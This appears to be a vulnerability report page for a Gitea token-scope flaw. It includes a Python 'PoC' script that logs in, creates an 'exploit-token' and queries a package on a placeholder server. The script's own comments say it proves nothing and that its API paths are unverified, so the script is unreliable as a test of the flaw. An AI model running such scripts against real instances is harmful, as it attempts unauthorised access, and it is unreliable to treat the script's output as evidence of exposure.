Security Vulnerability Report
CVE-2025-68944 CVSS 5.0 MEDIUM

CVE-2025-68944

Published: 2025-12-26 04:15:41
Last Modified: 2025-12-31 22:30:33

Description

Gitea before 1.22.2 sometimes mishandles the propagation of token scope for access control within one of its own package registries.

CVSS Details

CVSS Score
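5.0 (the "Secondary" assessment in the raw JSON below; the "Primary" assessment there scores 5.3 with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)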
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:* - VULNERABLE
Gitea < 1.22.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
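# CVE-2025-68944 PoC - Gitea Package Registry Token Scope Propagation
# This PoC demonstrates the improper token scope handling in Gitea < 1.22.2
#
# NOTE(review): this script is not a reliable detector for the CVE.
#   * exploit_package_access() requests a package under USERNAME's own
#     namespace, using a token that was itself requested with a package
#     scope, so an HTTP 200 there does not show a scope-propagation flaw.
#   * The advisory rates the issue C:N/I:L (integrity, not confidentiality),
#     while the only check performed here is a read.
#   * Any non-200 answer (bad credentials, wrong path, network error) ends
#     up in a "failed"/"not 200" branch, so a negative result is
#     inconclusive too.
#   * The request paths, form fields and scope names below have not been
#     verified against Gitea's API -- TODO confirm before relying on them.
# For exposure assessment, compare the deployed Gitea version with the fixed
# release (1.22.2) instead of relying on this script's output.

import requests
import json

# Placeholder values. With a plain "http://" URL the password and the
# created token travel in cleartext; prefer https.
GITEA_URL = "http://target-gitea-instance.com"
USERNAME = "attacker"
PASSWORD = "password"
PACKAGE_NAME = "sensitive-package"

# Seconds to wait for each HTTP request so a dead host cannot hang the script.
REQUEST_TIMEOUT = 10


def create_exploit_token():
    """Log in with USERNAME/PASSWORD and request an access token.

    Returns:
        The token string taken from the "sha1" field of the response, or
        None when the login or the token request does not return the
        expected status code or the field is missing.
    """
    # Login to Gitea
    session = requests.Session()
    login_data = {
        "user_name": USERNAME,
        "password": PASSWORD,
    }
    login_resp = session.post(
        f"{GITEA_URL}/user/login",
        data=login_data,
        timeout=REQUEST_TIMEOUT,
    )

    # NOTE(review): a 200 status alone may not prove the login succeeded;
    # verify against the server's actual login behaviour.
    if login_resp.status_code != 200:
        print("[-] Login failed")
        return None

    print("[+] Login successful")

    # Create package registry access token
    # In vulnerable versions, this token may have improper scope
    token_data = {
        "name": "exploit-token",
        "scopes": ["repo", "package"],
    }
    token_resp = session.post(
        f"{GITEA_URL}/api/v1/user/tokens",
        json=token_data,
        timeout=REQUEST_TIMEOUT,
    )

    if token_resp.status_code != 201:
        print("[-] Token creation failed")
        return None

    token = token_resp.json().get("sha1")
    if not token:
        print("[-] Token creation failed")
        return None

    # The token is a live credential: report success without echoing it, so
    # it does not end up in terminal scrollback or captured logs.
    print("[+] Token created (value not printed)")
    return token


def exploit_package_access(token):
    """Request the configured package with *token* and report the status.

    Args:
        token: access token string sent in the Authorization header.

    Returns:
        True when the server answers HTTP 200, False otherwise. Neither
        result is conclusive about CVE-2025-68944 (see the header note).
    """
    headers = {
        "Authorization": f"token {token}",
    }

    # The URL is built from USERNAME, i.e. the token owner's own namespace.
    package_url = f"{GITEA_URL}/api/v1/packages/{USERNAME}/{PACKAGE_NAME}"
    resp = requests.get(package_url, headers=headers, timeout=REQUEST_TIMEOUT)

    if resp.status_code == 200:
        print(f"[!] HTTP 200 for package: {PACKAGE_NAME} (inconclusive on its own)")
        print(f"[+] Package details: {json.dumps(resp.json(), indent=2)}")
        return True

    print(f"[-] HTTP {resp.status_code} for package request (inconclusive)")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-68944 PoC - Gitea Token Scope Propagation")
    print("=" * 60)

    try:
        token = create_exploit_token()
        if token:
            exploit_package_access(token)
    except requests.RequestException as exc:
        # Network-level failure: report it instead of dumping a traceback.
        print(f"[-] Request failed: {exc}")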

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68944", "sourceIdentifier": "[email protected]", "published": "2025-12-26T04:15:41.357", "lastModified": "2025-12-31T22:30:32.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea before 1.22.2 sometimes mishandles the propagation of token scope for access control within one of its own package registries."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.22.2", "matchCriteriaId": "C44BF23A-21FB-4E86-84C7-CC1E52CA9B3F"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.22.2/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/31967", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": 
"https://github.com/go-gitea/gitea/releases/tag/v1.22.2", "source": "[email protected]", "tags": ["Release Notes"]}]}}